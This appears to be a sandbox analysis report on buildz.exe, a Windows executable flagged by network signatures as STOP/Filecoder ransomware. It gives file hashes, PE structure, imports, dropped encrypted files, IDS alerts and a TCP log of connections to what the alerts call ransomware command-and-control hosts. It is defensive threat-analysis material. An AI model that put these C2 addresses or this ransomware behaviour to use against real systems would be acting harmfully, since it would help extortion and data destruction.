                        SHA-512:4A93B0C76DB25AE7919299837206A038593077FCB4456F6E2FF7A2EA1CB73A62A43ED09335401132F5B18AF9EFC997D4C4F5D13EAFDA7F2CD88720ED89506012
                        Malicious:false
                        Preview:CMMM ........)....~.a..N+....J._..R..8E....MV#.H..*....4..&.Q.B|.z..1.%...B...{.&..D6%..g...~W.-..t2.=........s)..Es.+Le...{.}.3...,..:..F...-7W. .V..<.Zww,...4..E...Uc.B.v...S.O=.@&.bC...H...?..t.l.:.......\...D...:.fqP.(5...Mt....7al.QT&...n..=..>m..%S.;.(.{..W.kEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.206555759515907
                        Encrypted:false
                        SSDEEP:6:cFcs8LzxJwaRe93VbgcoKcq83YlbZ27n51bGdWuFMr8FGcii96Z:8czIvi3KZ8IlbZ2751qdWuF26Gcii9a
                        MD5:6F7E78001725AD4BEAE825D05FDDACDD
                        SHA1:C472CF3C598EC96D8FD462219582F815E1F5050D
                        SHA-256:F2718BB2250176E07108AD3D758D71CA2D5BCE1F1C32269F0DD07E63A9D12368
                        SHA-512:99CF6142B37002CAA7523E5A880053F3527F10462C711E0368A0AE5267CDE4D57E9A174B2F2D8D8C696D50F269331ACF639BACF9E669EC4A611618E649B9DD4B
                        Malicious:false
                        Preview:CMMM I(.8.g..z..]....Z`...Wf....]j.]hz.+.V9.{..1...D.i......`.]%j..._U.s.l%-4.C..n.(.1c.2.....}.`......out.V.ARCx.k....H......"rq.G.....HE.A4d..A.1N`^..X=2.x.K#8.66..L...p\p.w...MI..G1.......+....Q..A,..k....c.Oz...Uh....Z.....n......+.)..v.^.O 4.aj.}_..;............EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.214224009413607
                        Encrypted:false
                        SSDEEP:6:22tUM1OAdSXyIYG0SHupqOR4vHalScnvL1zN8ShZ03nMr8FGcii96Z:22tv1O4SiIYG6pQHu5lN8Shq26Gcii9a
                        MD5:DAC41143A5F1B5DF8C633B3401046B1D
                        SHA1:8B4F8815D2B03949927FD16E1CA48AC0791C2120
                        SHA-256:AA807A9D885C6945EAFE4AE8F2371C41B852A15F7A9D1D3C176F9D74F912F69A
                        SHA-512:B41F86076026FCBF4389D1D41345202467E3E6EB5D40B161C94F69E1AF5575B3E14F00B08065A93634AD0EB8F28673CF87F6F9EB707778C7BCAE7FF68DA87720
                        Malicious:false
                        Preview:CMMM ...sqT.R..h..$..<1G`.......B.8M....I...=.4..a.@.;.......eOp.S..-..C-4....<7.....q\./^....t8...v.M.-....~..$....~...L_.l./.H.=M..h..;Z...[....6.........kM.c'.........i...W.}z.n..>t:...=.p........i..b2..:}...q...n..^.....i... "U...".,'X.".~X......:.@....<#kL.8.k.vEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.211629632616344
                        Encrypted:false
                        SSDEEP:6:A77XpYpVOjt6J6B5jJWCAFyAkI9tBPv0Q4ywaK0gxuMr8FGcii96Z:mXpYLOYJ6Mr5tB0HyX9F26Gcii9a
                        MD5:905AC82DD86CCDD3478519FFCE0574FD
                        SHA1:3B5EC9FA29D1FD8B9AB571676B755FC714E656E6
                        SHA-256:2D196DFD743B2957D6F1CCC17F8A606A25A6214D8C49FF6F0273D155F2E1E4E6
                        SHA-512:3CE6AC6FA872D54E2FF470FE0D20C4CBB15B93ED111013518E64B4CF9D6383253043435A41D6DC8251A54A85A5065910357E62A40B23A7A4A3E63671FA2E7353
                        Malicious:false
                        Preview:CMMM ...;...Y...i#.Y.d.@.....IL..q....U..t!..BkV....=}..7|%..3...).:.... .kR.. .=.J..G..H...%..Qp...$.w...w.y.7.l..l..,^..n..u.\W.`)1..!.....7_....g..i.o9...ip1......N#JpxC...Ni..I.F7..3Ljm...w.7F./.F.'.........U....RJ.....2.8...!....k......~.,B..r.......p.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.246095265095779
                        Encrypted:false
                        SSDEEP:6:iUYG9mC6cmUDrVN/9Jq8QUU7uBDvtOhmyH2Yts//608d/Ahtk/Mr8FGcii96Z:i3Vj2VRnqgEupyHPth/Aw26Gcii9a
                        MD5:8DF1CA58A0F0A3CE46A607D6DA450068
                        SHA1:18AB20F5C7F8CB9395A8E9E8E6A6A2C5EA38DBCD
                        SHA-256:6BD1D1D12402CFF9ECC882D5FFBEC232E62034B8148FC0C29A581A9AF77AFD67
                        SHA-512:6653662622B2AF92C3794C81D8A23C89C7FBB038E1139848DEE1DA61EE44B0683255F9018409869BE21A75CA244228A98DAA07026CF11291CE26DC41C2C71E35
                        Malicious:false
                        Preview:CMMM ..d.1...>.>.K!..S.}...C.Z=L}FDJhD.!y}.{..5., .Ez..1%...*.Nd..WV.N7.+0.. ...V....c.9.......y.... ..p9.}8.=....B../p.X..%..".J.. WK.T...U.$..%.svhq.!...y.......e....<.x....r...sE....f..r.$......E{......b.Y..9.]..m.n.%...+.........E....!..+...y|.`K.+.R-.JD.?EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):897
                        Entropy (8bit):7.796037501320161
                        Encrypted:false
                        SSDEEP:24:Y07mEvs6mObMjkfPYX51JcLfyui71J7FwkX1C7Kd0GbD:YkmAs6mOoj4PYX51afgJJjXoFUD
                        MD5:6ABF4919B575A6FFCB348B0B66E4776E
                        SHA1:5255DFD46C536A99E9FEABA6F3F3A1EA7B74E20E
                        SHA-256:6531D55C9459A6986F984618CA0CB17FA68FC33EB340E9D855E864E83952DAE2
                        SHA-512:F45533A1035AAFE3743C38FD9CA14A32EFC88706B9DCF8492AA4AF26FC21BDC81181A5072AFE26C97F486C42DCC3E1876173FDC7A289FE17F5955FD6508170D7
                        Malicious:false
                        Preview:{"pub...A......7.?.:...a.$5.[.=8h.H..z.:h..u...".2...{....Z.\.?...o......G7.....UU9Clw|......M.h@iv=J..)..Z.r..........-;.._.a....Rh._V...[.W...vWH*#.U...Z..1...v...M.:..!z..&=.a.;..g'..a.H.mH.=. .{j.}^....QK.v[.%..|....&....k.......0p.&../.....k%.k=.(........8.x....U..).`{..;.yq..c.M.........1..,...VAve.y^./.q....J2A.....h..y.....c..&...4OV..;{..u.@.....g?J&...^.......#u......2 .jIK ..i... kdy(c.S..IX..PZ%!t..d..z....#.... .c..Qs?E.O...U<.Q.i.6........R.".B...C..W...C..q..V[..n.SH>Po.....ue.i.,......&(...9.QGFP..h.......*.c&.....i.....GV.).8$.GK.]S..~.k.4`....`(.........^'....._=.;9...`....!0.(....&.{.|G\..A.."...!Qi.*..w,...1K.........g.Z4\.-....'a.}i....HE.W.B..pe...A...n..c.....%d.{.g..t..y..B.3.-...S....;....7,.*..l..../T....O.~$.:....!w.]......-...4b.7......Ml/..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.782011001754235
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:buildz.exe
                        File size:726'528 bytes
                        MD5:b7cb7f2b5cd9bd047710650295dc88f7
                        SHA1:3740ba8e89055cb0f5068ec9176b05c77432e799
                        SHA256:e01c0429a58b33013305aab35ef863cd2b88962e479e39566a687ca37c68510f
                        SHA512:e6bd45366d067dcc6cdcdc4d917c4e819942caccf22b64a1b1cf45199cdbf58defa0773a8d6a76c0672db2824a724018253efb0db1a0baf0c2f105d07758b471
                        SSDEEP:12288:9CwgCcyMy1Nncixi2NWXCAcrIQBjljKsFKfFDKZNF:9cCp9KGiAAcUwjljKAK8ZNF
                        TLSH:A7F4F160B6F45131FAF74BF4A9B092654B3BBD633A74918E71A03E1E1A332D099607C7
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L......^...^...^..Y^(..^..H^...^..^^o..^/P.^...^...^`..^..W^...^..I^...^..L^...^Rich...^........PE..L...e8td...................
                        Icon Hash:cb97354d5555599a
                        Entrypoint:0x401489
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x64743865 [Mon May 29 05:30:13 2023 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:0
                        File Version Major:5
                        File Version Minor:0
                        Subsystem Version Major:5
                        Subsystem Version Minor:0
                        Import Hash:8476d457b634f13fb056aaafe72c2253
                        Instruction
                        call 00007FB34CB4BEC1h
                        jmp 00007FB34CB4747Eh
                        mov edi, edi
                        push ebp
                        mov ebp, esp
                        sub esp, 00000328h
                        mov dword ptr [004A2918h], eax
                        mov dword ptr [004A2914h], ecx
                        mov dword ptr [004A2910h], edx
                        mov dword ptr [004A290Ch], ebx
                        mov dword ptr [004A2908h], esi
                        mov dword ptr [004A2904h], edi
                        mov word ptr [004A2930h], ss
                        mov word ptr [004A2924h], cs
                        mov word ptr [004A2900h], ds
                        mov word ptr [004A28FCh], es
                        mov word ptr [004A28F8h], fs
                        mov word ptr [004A28F4h], gs
                        pushfd
                        pop dword ptr [004A2928h]
                        mov eax, dword ptr [ebp+00h]
                        mov dword ptr [004A291Ch], eax
                        mov eax, dword ptr [ebp+04h]
                        mov dword ptr [004A2920h], eax
                        lea eax, dword ptr [ebp+08h]
                        mov dword ptr [004A292Ch], eax
                        mov eax, dword ptr [ebp-00000320h]
                        mov dword ptr [004A2868h], 00010001h
                        mov eax, dword ptr [004A2920h]
                        mov dword ptr [004A281Ch], eax
                        mov dword ptr [004A2810h], C0000409h
                        mov dword ptr [004A2814h], 00000001h
                        mov eax, dword ptr [004A1004h]
                        mov dword ptr [ebp-00000328h], eax
                        mov eax, dword ptr [004A1008h]
                        mov dword ptr [ebp-00000324h], eax
                        call dword ptr [0000007Ch]
                        Programming Language:
                        • [C++] VS2008 build 21022
                        • [ASM] VS2008 build 21022
                        • [ C ] VS2008 build 21022
                        • [IMP] VS2005 build 50727
                        • [RES] VS2008 build 21022
                        • [LNK] VS2008 build 21022
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9f88c0x3c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1310000xfa30.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x9f4080x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x9e0000x15c.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x9cea90x9d00059163c91dca7c3586553944b6af27562False0.9664501020103503data7.9697732091070135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x9e0000x204e0x220050a769e1f5715d89ba85fc6df554ff85False0.3508731617647059data5.395887591012532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xa10000x8d7e80x1e0046549ed15bfbbc42abd1f2043576f08dFalse0.12057291666666667data1.388579488575327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .yar0x12f0000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .befajam0x1300000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x1310000xfa300xfc00483f5c6f978ebb66bf2f86ca2083b65eFalse0.44915674603174605data4.938738602853264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_CURSOR0x137f280x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                        RT_CURSOR0x1380700x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                        RT_CURSOR0x1381a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                        RT_ICON0x1316c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.6087420042643923
                        RT_ICON0x1325680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6890794223826715
                        RT_ICON0x132e100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7459677419354839
                        RT_ICON0x1334d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7940751445086706
                        RT_ICON0x133a400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5851659751037345
                        RT_ICON0x135fe80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.7143527204502814
                        RT_ICON0x1370900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.7290983606557377
                        RT_ICON0x137a180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.87322695035461
                        RT_STRING0x13a9300x814data0.41731141199226307
                        RT_STRING0x13b1480x73cdata0.42548596112311016
                        RT_STRING0x13b8880x524data0.4490881458966565
                        RT_STRING0x13bdb00x1fcdata0.5039370078740157
                        RT_STRING0x13bfb00x754data0.42590618336886993
                        RT_STRING0x13c7080x774data0.42033542976939203
                        RT_STRING0x13ce800x560data0.44476744186046513
                        RT_STRING0x13d3e00x6c2data0.42658959537572255
                        RT_STRING0x13daa80x6eedata0.4317925591882751
                        RT_STRING0x13e1980x7a8data0.41836734693877553
                        RT_STRING0x13e9400x76cdata0.41789473684210526
                        RT_STRING0x13f0b00x5fcdata0.4366840731070496
                        RT_STRING0x13f6b00x5e2data0.4342629482071713
                        RT_STRING0x13fc980x7a2data0.4181166837256909
                        RT_STRING0x1404400x5bedata0.4489795918367347
                        RT_STRING0x140a000x2adata0.5952380952380952
                        RT_ACCELERATOR0x137ef80x30data0.9583333333333334
                        RT_GROUP_CURSOR0x1380580x14data1.15
                        RT_GROUP_CURSOR0x13a7480x22data1.088235294117647
                        RT_GROUP_ICON0x137e800x76dataTurkishTurkey0.6610169491525424
                        RT_VERSION0x13a7700x1bcdata0.5788288288288288
                        DLLImport
                        KERNEL32.dllOpenJobObjectA, InterlockedDecrement, ZombifyActCtx, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesA, LoadLibraryW, SetVolumeMountPointA, WriteConsoleW, GetAtomNameW, SetUnhandledExceptionFilter, GetProcAddress, LoadLibraryA, OpenWaitableTimerW, LocalAlloc, GetCommMask, EnumDateFormatsA, CreateWaitableTimerW, lstrcatW, FindFirstVolumeW, AreFileApisANSI, SetLastError, GetNumaProcessorNode, GetLastError, HeapFree, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, ReadFile, HeapSize, CreateFileA, CloseHandle
                        ADVAPI32.dllReadEventLogA
                        Language of compilation systemCountry where language is spokenMap
                        TurkishTurkey
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-05T16:26:04.602511+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704188.114.97.3443TCP
                        2024-10-05T16:26:13.362152+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705188.114.97.3443TCP
                        2024-10-05T16:26:16.993980+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549711190.219.117.24080TCP
                        2024-10-05T16:26:16.993980+02002036334ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key1192.168.2.549711190.219.117.24080TCP
                        2024-10-05T16:26:17.000369+02002036335ET MALWARE Win32/Filecoder.STOP Variant Public Key Download1190.219.117.24080192.168.2.549711TCP
                        2024-10-05T16:26:25.360105+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549751188.114.97.3443TCP
                        2024-10-05T16:26:36.529275+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549797188.114.97.3443TCP
                        2024-10-05T16:26:46.617721+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549858188.114.97.3443TCP
                        2024-10-05T16:26:48.167152+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549869190.219.117.24080TCP
                        2024-10-05T16:26:48.167152+02002833438ETPRO MALWARE STOP Ransomware CnC Activity1192.168.2.549869190.219.117.24080TCP
                        2024-10-05T16:26:48.174876+02002036335ET MALWARE Win32/Filecoder.STOP Variant Public Key Download1190.219.117.24080192.168.2.549869TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Oct 5, 2024 16:26:02.899070024 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:02.899115086 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:02.899184942 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:02.909305096 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:02.909321070 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:03.430002928 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:03.430099010 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:03.474423885 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:03.474462986 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:03.474772930 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:03.474832058 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:03.476932049 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:03.523407936 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:04.602495909 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:04.602591038 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:04.602685928 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:04.602685928 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:04.618212938 CEST49704443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:04.618230104 CEST44349704188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:11.945597887 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:11.945702076 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:11.945782900 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:11.957910061 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:11.957945108 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:12.418608904 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:12.418692112 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.008444071 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.008511066 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:13.009612083 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:13.009752989 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.015930891 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.063445091 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:13.362215042 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:13.362293005 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.362329006 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:13.362392902 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.362426043 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:13.362452984 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:13.362478971 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.362504959 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.363075018 CEST49705443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:13.363105059 CEST44349705188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:15.961061954 CEST4971180192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:15.966115952 CEST8049711190.219.117.240192.168.2.5
                        Oct 5, 2024 16:26:15.966355085 CEST4971180192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:15.966355085 CEST4971180192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:15.971244097 CEST8049711190.219.117.240192.168.2.5
                        Oct 5, 2024 16:26:16.993844986 CEST8049711190.219.117.240192.168.2.5
                        Oct 5, 2024 16:26:16.993979931 CEST4971180192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:16.994837999 CEST4971180192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:17.000369072 CEST8049711190.219.117.240192.168.2.5
                        Oct 5, 2024 16:26:17.000457048 CEST4971180192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:24.201942921 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:24.202024937 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:24.202110052 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:24.510077000 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:24.510106087 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:24.983855009 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:24.983958006 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.014096975 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.014144897 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:25.015018940 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:25.015091896 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.016941071 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.063431978 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:25.360152006 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:25.360233068 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.360292912 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:25.360357046 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.360371113 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:25.360418081 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:25.360428095 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.360465050 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.379311085 CEST49751443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:25.379375935 CEST44349751188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:35.609626055 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:35.609678984 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:35.609838963 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:35.675010920 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:35.675045013 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:36.134052038 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:36.134120941 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:36.146353960 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:36.146373034 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:36.146677017 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:36.146733046 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:36.151762962 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:36.199398041 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:36.529313087 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:36.529388905 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:36.529408932 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:36.529427052 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:36.529464960 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:36.530246019 CEST49797443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:36.530258894 CEST44349797188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:45.587589979 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:45.587677956 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:45.587862015 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:45.778911114 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:45.778949976 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.251534939 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.251621962 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:46.263827085 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:46.263858080 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.264219046 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.264292955 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:46.269421101 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:46.311450958 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.617810965 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.617886066 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:46.617904902 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.617970943 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:46.617984056 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.618026018 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:46.618102074 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:46.618102074 CEST49858443192.168.2.5188.114.97.3
